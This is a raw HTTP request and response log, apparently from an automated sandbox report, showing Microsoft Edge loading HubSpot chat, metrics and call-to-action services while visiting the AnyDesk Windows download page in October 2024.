sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:10 GMT
content-type: application/json;charset=utf-8
content-length: 528
cf-ray: 8cdeab3b3ff50bad-AMS
cf-cache-status: DYNAMIC
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
server-timing: hcid;desc=ed049e29-de16-4883-9034-87a1ba8c240a
x-content-type-options: nosniff
x-hubspot-correlation-id: ed049e29-de16-4883-9034-87a1ba8c240a
set-cookie: __cf_bm=3y1Fh0N26CIam_Qy6WaXvutB0ZeVXbAKVosQ97U0uCI-1728144490-1.0.1.1-W8wthlyy9mAIyAXt6PPNsIpSaFi7..ZaKrM6Mh9of9nf9duOgDXmfrNTUtwtIo7Xtq4H_db3UGmA3nQqD_8eDg; path=/; expires=Sat, 05-Oct-24 16:38:10 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdeFy5bl54pO69LgjcLhqrvrTUiZthRnN527XsyE32MCJS2Ik4bOeJKh2Hjgg1T4e8PmngM6f5IEhUJkyXgNgllEvgY3XfMyudioVCwVxNdvmLhQ3gOENKylujRvRO9O%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=6pb2552ey0BkZtlM1_k9YkR_5YnyLR_FVquk7ouK3mo-1728144490936-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 3260
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:14 GMT
cf-ray: 8cdeab50bdd10bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=6619985c-7f98-4145-bcc6-5d45d7440d86
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 6619985c-7f98-4145-bcc6-5d45d7440d86
set-cookie: __cf_bm=327J2qL75a1S9ltIWXZn9BO81utPlMLIVIHVmL7sXuc-1728144494-1.0.1.1-eUZapCXj0OkGqQRlVw_vVFzC6qFC9tA9_Lfvvqtj1SppXvNdUyeegofsYtNpAzURFLoA6tQgSumF0AxeDb.cdg; path=/; expires=Sat, 05-Oct-24 16:38:14 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PHdC1La5OVEnwQsVe2ncuFs3LpBW3nKv7Flfu2NpwSVJnui%2BznnuCmCOHwt5%2BGTCCSmKy1N4i7pH5srdG4yp35Zgy9RqKyKXzPJ8GctFus5m8Lkp8dZCFoxKa9RnfrOasg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=QpsQVolysUcf2LQBbeg4AWVlYP0kgGSfM9aAf5WDLmo-1728144494332-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 330
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:15 GMT
cf-ray: 8cdeab569f000bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=ef1b66cf-a49e-4a23-94a4-1758d30ea417
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: ef1b66cf-a49e-4a23-94a4-1758d30ea417
set-cookie: __cf_bm=cIBzo6KPbbYPKEMEqJQO8HgdzHTxCFyqEoXpVkRX51w-1728144495-1.0.1.1-fkhDUcMGRBV1V4JJk.0iGsDhc_QTpgjIAP86sWt.hPjtKnOSC5aDmLlrpkE4ckEtUVS1ImCzsQUN4tjXaB9_Xw; path=/; expires=Sat, 05-Oct-24 16:38:15 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsa3gmioHfMIIDgmHbhUf4P7Ktpi3Ku925%2Fz0TEeA2%2B7Ufd%2F9C9Jc4T4gw7hEbkhBnj6FjDcIyUH%2F4%2BAMiU5NYmEhKjUqKibIdQ869pW9Xmo7dY7NDzTC%2FglYF6L6bAo%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=9Qo2z6gvkJiYj8eltwtumJ20Hv4emKP2kJMczvPXjWk-1728144495274-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626 HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 2145
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:15 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 7
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 1dd14a1f-bb81-40a8-a585-c5986b6ce674
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-4kmpb
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 1dd14a1f-bb81-40a8-a585-c5986b6ce674
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=o8X4MzvlmUpS.f.pYNwuY4PEyETEdzs.6fXIjbb_1.o-1728144495-1.0.1.1-4kDhiQNK3aLxIFCOvM5pPofxR7VyF2INGF6Te_T_y.oiqdLgiRXW64x7Y2EAyLXpAYG3szrgAbx_aNTcXMjAZg; path=/; expires=Sat, 05-Oct-24 16:38:15 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4qtm9odw17WTJmwZxVyfsdjxKxPUkvzphlZaYsXyLPDvXb0VEnH8FtaYS8xUC4%2BhFit%2BqfG7lb7O%2FyDDgv8shQRXQaZ5A%2FVsxeJOpqdrQy5BrgK76eTtZMqlviKbORQ69e4j4%2FcmKpXjXBk"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=b5gDTt13efvHziAIK3ahqxPTglj9UgbfSVLZDz61R_0-1728144495323-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab570f840bad-AMS
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/send HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 589
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:15 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 25
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 9948879d-f142-4525-98be-cb5e2e8ee347
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-5jgp4
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 9948879d-f142-4525-98be-cb5e2e8ee347
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=8xYkDVSiAGqxfGVCa3FTnPPhpt2rAuJOvYFBScHdfGM-1728144495-1.0.1.1-W_257GqS4Yh8nfO0xskKTgCPPIlhG3vOIg_i30vhg1Q8NjRIgMODQXJ2un8sP_3G1UHqL7GOGogSGhSk8aOM6w; path=/; expires=Sat, 05-Oct-24 16:38:15 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMJFcF26jdEdJwHidw8u4Jky%2F3HQmRxOM6VBT7%2FQXQBa9PYMalBtmQaEP2fB2g9aNr1ViyMEI%2FhcYGJUj16BWQgsfe3wN6SG9Iheflb%2FT5hwcV%2FuWs8zpdTzVLbMRedpS3t%2FVRPefIrRT7%2BF"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=yV.1iT4w.tJWGBKanpN9snwNjZL0eyOffUELJFv4KcU-1728144495449-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab5798830bad-AMS
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 10
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: fe9b2624-5587-42f5-8360-c02aece0dbd2
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-npl4k
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: fe9b2624-5587-42f5-8360-c02aece0dbd2
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=N86YTa.V0sQ5UddLTipPnXOewXUrmWewcH4Txvq5iMI-1728144496-1.0.1.1-fysu67PCnbN14nUdpl_oCOvd8VQKVQlsEvREPLkpj64UdYVXPf4qNkNH8lvONsBk16qy_6P65IQR7qMnUq1oTQ; path=/; expires=Sat, 05-Oct-24 16:38:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJg7Mx2FojHHWvoy2LTbT8DKMMsjCgazuyvg%2Bqb0Wkjis3EJLc3Z3q8AB4DERyMgcDi4t47ptQOalEPE%2B50dg4rURxNARyK9EwNOsbhBkkgZhkyHpI7Kpxd5x9KFBlLfWdhZ9dTQbuL2LWzA4nU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=CDtg6V_RfcQLeEhfxuxzaNCIuynyDHT2s_AmGdwCp.A-1728144496173-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab5c4edd0bad-AMS
content-encoding: br
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeab5c4ee00bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 026c5e5a-fe8e-4c21-862a-5dd9d3866c27
set-cookie: __cf_bm=1enAIluPQB70Ency9mFrblDH9uWTut7JRoaUgn0ZKOg-1728144496-1.0.1.1-OkCzCOvmo6ZJfWo3aWz_f5cLIeF4m2FrNlnGaOZR_8lVHf1njSji4REoWpLacmz9icP2PDwlsqiTT35o0RABkA; path=/; expires=Sat, 05-Oct-24 16:38:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
